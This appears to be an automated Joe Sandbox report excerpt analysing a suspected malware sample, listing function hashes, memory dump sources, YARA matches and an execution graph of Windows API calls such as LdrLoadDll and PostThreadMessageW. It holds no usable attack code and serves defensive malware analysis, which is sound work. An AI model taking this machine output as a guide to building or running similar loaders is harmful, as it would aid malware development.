                                                                                                                                        • String ID: ?gN$xBR
                                                                                                                                        • API String ID: 0-2937344748
                                                                                                                                        • Opcode ID: 6ce0c5911ca8279ba9e1b8f6f95df5dc981f961ab76b4305db2656d86b12f4c0
                                                                                                                                        • Instruction ID: 6639b73fbf6105c08a672de96373f8aaded9aafcba15ecde98ca0847a97710c1
                                                                                                                                        • Opcode Fuzzy Hash: 6ce0c5911ca8279ba9e1b8f6f95df5dc981f961ab76b4305db2656d86b12f4c0
                                                                                                                                        • Instruction Fuzzy Hash: 00E1FAB4E002598FDB14CFA9D5909AEBBF2FF89304F248159E418A7356D735AD81CFA0
                                                                                                                                        Function 07304D68 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ,.R
                                                                                                                                        • API String ID: 0-136454914
                                                                                                                                        • Opcode ID: 2bb7f3698451b9ba2ce5abe92f97b3f72823d4ff40cde9fcd5d4b0c96f2fdcfa
                                                                                                                                        • Instruction ID: d23ca44372864f7f05101a8604378c7808ef280094c88cd2c3d763a8a3dcc63d
                                                                                                                                        • Opcode Fuzzy Hash: 2bb7f3698451b9ba2ce5abe92f97b3f72823d4ff40cde9fcd5d4b0c96f2fdcfa
                                                                                                                                        • Instruction Fuzzy Hash: 9CE1E9B4E002598FDB14CFA9D5909AEBBF2FF89304F248159E418AB355D734AD81CFA1
                                                                                                                                        Function 07E4A7C8 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1702447336.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7e40000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'kq
                                                                                                                                        • API String ID: 0-3255046985
                                                                                                                                        • Opcode ID: 8593c4d18c07cae660ad6f2f4a289dd7df31d326e595d6fee48370b17ed8fe0b
                                                                                                                                        • Instruction ID: 217bc9eb2291c13c674567e6694bcec3ee6a202573af55c1390397ccdc4680d0
                                                                                                                                        • Opcode Fuzzy Hash: 8593c4d18c07cae660ad6f2f4a289dd7df31d326e595d6fee48370b17ed8fe0b
                                                                                                                                        • Instruction Fuzzy Hash: BB611B70A152099FDB08DF7BE94569ABBF2FBC8300F14D429D418973A8EF345A45CB80
                                                                                                                                        Function 073055D8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bafdea963b2429acce81b77ab967d13dcaf3a512e63503dfd78809c74cfa7d63
                                                                                                                                        • Instruction ID: 24bad5b7e962d017d208fccf4dc9ef974f089e74976930ce537691d5cb7f21da
                                                                                                                                        • Opcode Fuzzy Hash: bafdea963b2429acce81b77ab967d13dcaf3a512e63503dfd78809c74cfa7d63
                                                                                                                                        • Instruction Fuzzy Hash: E1E1F9B4E002598FDB14CFA9D5909AEBBF2FF89304F248159D419AB356D734AD81CFA0
                                                                                                                                        Function 073051A0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b52e5268bd0355a90f6740f15cb62a0e2f1edc8679272682a93d1a32b8212294
                                                                                                                                        • Instruction ID: 6fff95bfdaf86b2b0f16dd57de80573ca51603786e88e33f10b77b7f94137e3c
                                                                                                                                        • Opcode Fuzzy Hash: b52e5268bd0355a90f6740f15cb62a0e2f1edc8679272682a93d1a32b8212294
                                                                                                                                        • Instruction Fuzzy Hash: 48E1FAB4E002598FDB14CFA9D5909AEFBF2FF89304F248159E419AB355D731A981CFA0
                                                                                                                                        Function 07306878 Relevance: .3, Instructions: 312COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1700679136.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7300000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5266283d97c09f5939d24e8678e2a8d324a93cddb4973e5aa8de23051041e488
                                                                                                                                        • Instruction ID: f48dddfe17b39d7dbaa5a8e5bc1d75496fdfd2746064cae37cec310d9a2b947c
                                                                                                                                        • Opcode Fuzzy Hash: 5266283d97c09f5939d24e8678e2a8d324a93cddb4973e5aa8de23051041e488
                                                                                                                                        • Instruction Fuzzy Hash: 8FE1FBB4E00259CFDB14DFA9D5919AEBBF2FF89304F248159D418AB359D730A981CFA0
                                                                                                                                        Function 0305D63C Relevance: .3, Instructions: 264COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1697354167.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3050000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b9f56d33b9d9c3d67c7a457e0be0e475ef0a23695c5251e4c8a8a9227be11b4e
                                                                                                                                        • Instruction ID: 3e6903044c0a1f881daf03e04a0437bf852453535181ec9579a1340375f7847c
                                                                                                                                        • Opcode Fuzzy Hash: b9f56d33b9d9c3d67c7a457e0be0e475ef0a23695c5251e4c8a8a9227be11b4e
                                                                                                                                        • Instruction Fuzzy Hash: 77A14C7AE0230ACFCF05DFA4C8445EEB7B2FF85300B15856AE805AB265DB79E955CB40

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:1.3%
                                                                                                                                        Dynamic/Decrypted Code Coverage:4.8%
                                                                                                                                        Signature Coverage:7.6%
                                                                                                                                        Total number of Nodes:145
                                                                                                                                        Total number of Limit Nodes:12
                                                                                                                                        execution_graph 92619 42bf23 92620 42bf40 92619->92620 92623 1132df0 LdrInitializeThunk 92620->92623 92621 42bf65 92623->92621 92624 424be3 92625 424bff 92624->92625 92626 424c27 92625->92626 92627 424c3b 92625->92627 92628 42c8c3 NtClose 92626->92628 92634 42c8c3 92627->92634 92630 424c30 92628->92630 92631 424c44 92637 42ea73 RtlAllocateHeap 92631->92637 92633 424c4f 92635 42c8e0 92634->92635 92636 42c8ee NtClose 92635->92636 92636->92631 92637->92633 92638 424f83 92642 424f9c 92638->92642 92639 42502f 92640 424fe7 92646 42e953 92640->92646 92642->92639 92642->92640 92644 42502a 92642->92644 92645 42e953 RtlFreeHeap 92644->92645 92645->92639 92649 42cc03 92646->92649 92648 424ff7 92650 42cc20 92649->92650 92651 42cc2e RtlFreeHeap 92650->92651 92651->92648 92662 42f9f3 92663 42fa03 92662->92663 92664 42fa09 92662->92664 92667 42ea33 92664->92667 92666 42fa2f 92670 42cbc3 92667->92670 92669 42ea4e 92669->92666 92671 42cbdd 92670->92671 92672 42cbeb RtlAllocateHeap 92671->92672 92672->92669 92652 4141c3 92653 4141d4 92652->92653 92658 417993 92653->92658 92655 4141fb 92656 414240 92655->92656 92657 41422f PostThreadMessageW 92655->92657 92657->92656 92659 417996 92658->92659 92660 4179f3 LdrLoadDll 92659->92660 92661 4179be 92659->92661 92660->92661 92661->92655 92673 41a753 92674 41a76b 92673->92674 92676 41a7c5 92673->92676 92674->92676 92677 41e6b3 92674->92677 92678 41e6d9 92677->92678 92682 41e7d6 92678->92682 92683 42fb23 92678->92683 92680 41e774 92680->92682 92689 42bf73 92680->92689 92682->92676 92684 42fa93 92683->92684 92685 42ea33 RtlAllocateHeap 92684->92685 92686 42faf0 92684->92686 92687 42facd 92685->92687 92686->92680 92688 42e953 RtlFreeHeap 92687->92688 92688->92686 92690 42bf90 92689->92690 92693 1132c0a 92690->92693 92691 42bfb9 92691->92682 92694 1132c11 92693->92694 92695 1132c1f LdrInitializeThunk 92693->92695 92694->92691 92695->92691 92696 418ff3 92698 419023 92696->92698 92699 41904f 92698->92699 92700 41b4b3 92698->92700 92701 41b4f7 92700->92701 92702 41b518 92701->92702 92703 42c8c3 NtClose 92701->92703 92702->92698 92703->92702 92704 1132b60 LdrInitializeThunk 92705 4019d4 92706 4019df 92705->92706 92709 42fec3 92706->92709 92712 42e513 92709->92712 92713 42e539 92712->92713 92724 4072b3 92713->92724 92715 42e54f 92723 401a2d 92715->92723 92727 41b2c3 92715->92727 92717 42e56e 92718 42e583 92717->92718 92742 42cc53 92717->92742 92738 4284d3 92718->92738 92721 42e59d 92722 42cc53 ExitProcess 92721->92722 92722->92723 92745 416643 92724->92745 92726 4072c0 92726->92715 92728 41b2ef 92727->92728 92756 41b1b3 92728->92756 92731 41b334 92734 41b350 92731->92734 92736 42c8c3 NtClose 92731->92736 92732 41b31c 92733 41b327 92732->92733 92735 42c8c3 NtClose 92732->92735 92733->92717 92734->92717 92735->92733 92737 41b346 92736->92737 92737->92717 92739 428535 92738->92739 92741 428542 92739->92741 92767 418813 92739->92767 92741->92721 92743 42cc70 92742->92743 92744 42cc81 ExitProcess 92743->92744 92744->92718 92746 41665d 92745->92746 92748 416673 92746->92748 92749 42d2f3 92746->92749 92748->92726 92750 42d30d 92749->92750 92751 42d33c 92750->92751 92752 42bf73 LdrInitializeThunk 92750->92752 92751->92748 92753 42d396 92752->92753 92754 42e953 RtlFreeHeap 92753->92754 92755 42d3ac 92754->92755 92755->92748 92757 41b2a9 92756->92757 92758 41b1cd 92756->92758 92757->92731 92757->92732 92762 42c013 92758->92762 92761 42c8c3 NtClose 92761->92757 92763 42c030 92762->92763 92766 11335c0 LdrInitializeThunk 92763->92766 92764 41b29d 92764->92761 92766->92764 92769 41883d 92767->92769 92768 418d3b 92768->92741 92769->92768 92775 413e23 92769->92775 92771 41896a 92771->92768 92772 42e953 RtlFreeHeap 92771->92772 92773 418982 92772->92773 92773->92768 92774 42cc53 ExitProcess 92773->92774 92774->92768 92779 413e43 92775->92779 92777 413eac 92777->92771 92779->92777 92780 41b5d3 92779->92780 92781 41b5f8 92780->92781 92787 429c73 92781->92787 92783 413ea2 92783->92771 92785 41b629 92785->92783 92786 42e953 RtlFreeHeap 92785->92786 92792 41b413 LdrInitializeThunk 92785->92792 92786->92785 92788 429cd8 92787->92788 92789 429d0b 92788->92789 92793 413c83 92788->92793 92789->92785 92791 429ced 92791->92785 92792->92785 92794 413c4e 92793->92794 92797 413d0d 92794->92797 92798 42cb33 92794->92798 92797->92791 92799 42cb4d 92798->92799 92802 1132c70 LdrInitializeThunk 92799->92802 92800 413c62 92800->92791 92802->92800

                                                                                                                                        Executed Functions

                                                                                                                                        Function 00417993 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 114 417993-4179bc call 42f533 118 4179c2-4179d0 call 42fb33 114->118 119 4179be-4179c1 114->119 122 4179e0-4179f1 call 42dfe3 118->122 123 4179d2-4179dd call 42fdd3 118->123 128 4179f3-417a07 LdrLoadDll 122->128 129 417a0a-417a0d 122->129 123->122 128->129
                                                                                                                                        APIs
                                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A05
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_QsBdpe1gK5.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2234796835-0
                                                                                                                                        • Opcode ID: 3450b841a561fce2ec7eb3af1f5bde3703eef7511fec9e05869c83b7c4bbb847
                                                                                                                                        • Instruction ID: c05735af9d87ff809b405e5c58a4850cca5856ce1274a566620df5b546512d83
                                                                                                                                        • Opcode Fuzzy Hash: 3450b841a561fce2ec7eb3af1f5bde3703eef7511fec9e05869c83b7c4bbb847
                                                                                                                                        • Instruction Fuzzy Hash: 290171B1E0020DBBDF10DBE5DC42FDEB7B89B54308F4041AAE90897240F634EB488B95
                                                                                                                                        Function 0042C8C3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 140 42c8c3-42c8fc call 4046d3 call 42dad3 NtClose
                                                                                                                                        APIs
                                                                                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C8F7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_QsBdpe1gK5.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                        • Opcode ID: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                                                                        • Instruction ID: 133e63d4455ab17c9b30316577fb7d960e1753245c68e5cabd7d79e4ae334b6d
                                                                                                                                        • Opcode Fuzzy Hash: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                                                                        • Instruction Fuzzy Hash: 46E086356042147BD120EB5AEC41F9B775CDFC5754F408419FA09A7241C6B5B91187F5
                                                                                                                                        Function 01132B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 154 1132b60-1132b6c LdrInitializeThunk
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: ceefda4a6eb240a5209e3f9ffc8411d2ad1740f30cec2c4e7087aa16d852cbbb
                                                                                                                                        • Instruction ID: 9a20eaa00d1d9d57c58f939d4bee42cfa58ab8e17cbba23e4709a2a2f635dfe2
                                                                                                                                        • Opcode Fuzzy Hash: ceefda4a6eb240a5209e3f9ffc8411d2ad1740f30cec2c4e7087aa16d852cbbb
                                                                                                                                        • Instruction Fuzzy Hash: AA90026120240003410971984514616400A97E0601B65C021E1015590DC66589916225
                                                                                                                                        Function 01132DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: aff0ca782836778a5290371c666e3d635037ffba66bc02d01b2c9b034ed15762
                                                                                                                                        • Instruction ID: b6811c708fdffc44daf7f05b0493d658dd95002e8ef673b6ab54c8679d1782e1
                                                                                                                                        • Opcode Fuzzy Hash: aff0ca782836778a5290371c666e3d635037ffba66bc02d01b2c9b034ed15762
                                                                                                                                        • Instruction Fuzzy Hash: 4B90023120140413D11571984604707000997D0641FA5C412A0425558DD7968A52A221
                                                                                                                                        Function 01132C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 155 1132c70-1132c7c LdrInitializeThunk
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 4fc9e783739ef0e220597acbe817c38c7f552e1f668356de9d31031f2005bd07
                                                                                                                                        • Instruction ID: 7dd2fe59ea6a9a921d717e30ff8bb1f1c84733920668d6ee630e638c586304a0
                                                                                                                                        • Opcode Fuzzy Hash: 4fc9e783739ef0e220597acbe817c38c7f552e1f668356de9d31031f2005bd07
                                                                                                                                        • Instruction Fuzzy Hash: C890023120148803D1147198850474A000597D0701F69C411A4425658DC7D589917221
                                                                                                                                        Function 011335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 30e0705fa839f3a82514422120df2bb8a7e723d037231c414561f35edaca0444
                                                                                                                                        • Instruction ID: 01d975d27a0be138c51d5e1cb2cb365fce5f2803321ab11f2a8dcb8f91e59774
                                                                                                                                        • Opcode Fuzzy Hash: 30e0705fa839f3a82514422120df2bb8a7e723d037231c414561f35edaca0444
                                                                                                                                        • Instruction Fuzzy Hash: EE90023160550403D10471984614706100597D0601F75C411A0425568DC7D58A5166A2
                                                                                                                                        Function 0041415A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92threadwindowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 0041423A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_QsBdpe1gK5.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: e151968$e151968
                                                                                                                                        • API String ID: 1836367815-1714165782
                                                                                                                                        • Opcode ID: de3d6622b2c7e253488efd82844506778fe438f6aa130dcb7ce2e9c228e4284e
                                                                                                                                        • Instruction ID: 7251796555732349115f912c6c4c209aa57bdead8f3eb1923ae9839e20d07678
                                                                                                                                        • Opcode Fuzzy Hash: de3d6622b2c7e253488efd82844506778fe438f6aa130dcb7ce2e9c228e4284e
                                                                                                                                        • Instruction Fuzzy Hash: A721FEB2A092587ADB015BB85C418FEBB6CCF42374B0482AFF884DB282D26D4D8343D1
                                                                                                                                        Function 004141C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 0041423A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_QsBdpe1gK5.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: e151968$e151968
                                                                                                                                        • API String ID: 1836367815-1714165782
                                                                                                                                        • Opcode ID: 9c4519be433183e511d57a0ca24e41333fd38ee9197568bd8c116b46864e7620
                                                                                                                                        • Instruction ID: fb6054b137b1b7a90670ef45b58f19e18da369be72312329e7a814f8d004de60
                                                                                                                                        • Opcode Fuzzy Hash: 9c4519be433183e511d57a0ca24e41333fd38ee9197568bd8c116b46864e7620
                                                                                                                                        • Instruction Fuzzy Hash: D601DBB1D4021C7EEB11AAE59C81DEF7B7CDF41798F04806AF904B7241E67C4E4647A5
                                                                                                                                        Function 004141C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 0041423A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_QsBdpe1gK5.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: e151968$e151968
                                                                                                                                        • API String ID: 1836367815-1714165782
                                                                                                                                        • Opcode ID: 0a07cd0e95027d051652f65d03272d9818b42054f858fe44f33b56e8d39d78d9
                                                                                                                                        • Instruction ID: 304f4617cef094d7948f8b4e0ba8c288fe5f41b46d30d6681db389c3092ba291
                                                                                                                                        • Opcode Fuzzy Hash: 0a07cd0e95027d051652f65d03272d9818b42054f858fe44f33b56e8d39d78d9
                                                                                                                                        • Instruction Fuzzy Hash: 8601DBB1D0021C7ADB10AAE59C81DEF7B7CDF41798F04806AF90467241E67C4E4647A5
                                                                                                                                        Function 00414147 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56threadwindowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 0041423A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_QsBdpe1gK5.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                        • String ID: e151968$e151968
                                                                                                                                        • API String ID: 1836367815-1714165782
                                                                                                                                        • Opcode ID: 9917860a06c5491fd7527a9a567e0fdb5327c2d310581294f1f00c85882a137f
                                                                                                                                        • Instruction ID: a03890bf0caf07f143295e344698684d57de9b4f9a149aaa8d59faff12e514fd
                                                                                                                                        • Opcode Fuzzy Hash: 9917860a06c5491fd7527a9a567e0fdb5327c2d310581294f1f00c85882a137f
                                                                                                                                        • Instruction Fuzzy Hash: 150166B2D04218B9DB10EAA58C82CEF7B7CDF81358F0481AAF914B7240D67C4A474BA4
                                                                                                                                        Function 0042CBC3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 130 42cbc3-42cc01 call 4046d3 call 42dad3 RtlAllocateHeap
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(?,0041E774,?,?,00000000,?,0041E774,?,?,?), ref: 0042CBFC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_QsBdpe1gK5.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                        • Opcode ID: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                                                                        • Instruction ID: d1daadd5b738771fcf8a8578342262517393979b432d42d69ec70eba3b553b61
                                                                                                                                        • Opcode Fuzzy Hash: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                                                                        • Instruction Fuzzy Hash: 48E092716042087FC610EE59EC42E9B37ACDFC9754F008419F908A7242D670BD1087B9
                                                                                                                                        Function 0042CC03 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 135 42cc03-42cc44 call 4046d3 call 42dad3 RtlFreeHeap
                                                                                                                                        APIs
                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,558D0001,00000007,00000000,00000004,00000000,004171F6,000000F4), ref: 0042CC3F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_QsBdpe1gK5.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                        • Opcode ID: 7acc9a6ebdbca071d54bd213222d546e1c3df986107a84034640cb851cd2662b
                                                                                                                                        • Instruction ID: a8743f59d5fd6b324e8fb9b63301b2ee65a769d322d9c6f3b811b81c9c5f29be
                                                                                                                                        • Opcode Fuzzy Hash: 7acc9a6ebdbca071d54bd213222d546e1c3df986107a84034640cb851cd2662b
                                                                                                                                        • Instruction Fuzzy Hash: D1E092716042157BC610EE49DC41F9B73ACDFC5710F004419FE08A7242D670BD2087B8
                                                                                                                                        Function 0042CC53 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 145 42cc53-42cc8f call 4046d3 call 42dad3 ExitProcess
                                                                                                                                        APIs
                                                                                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,BED2F641,?,?,BED2F641), ref: 0042CC8A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_QsBdpe1gK5.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExitProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 621844428-0
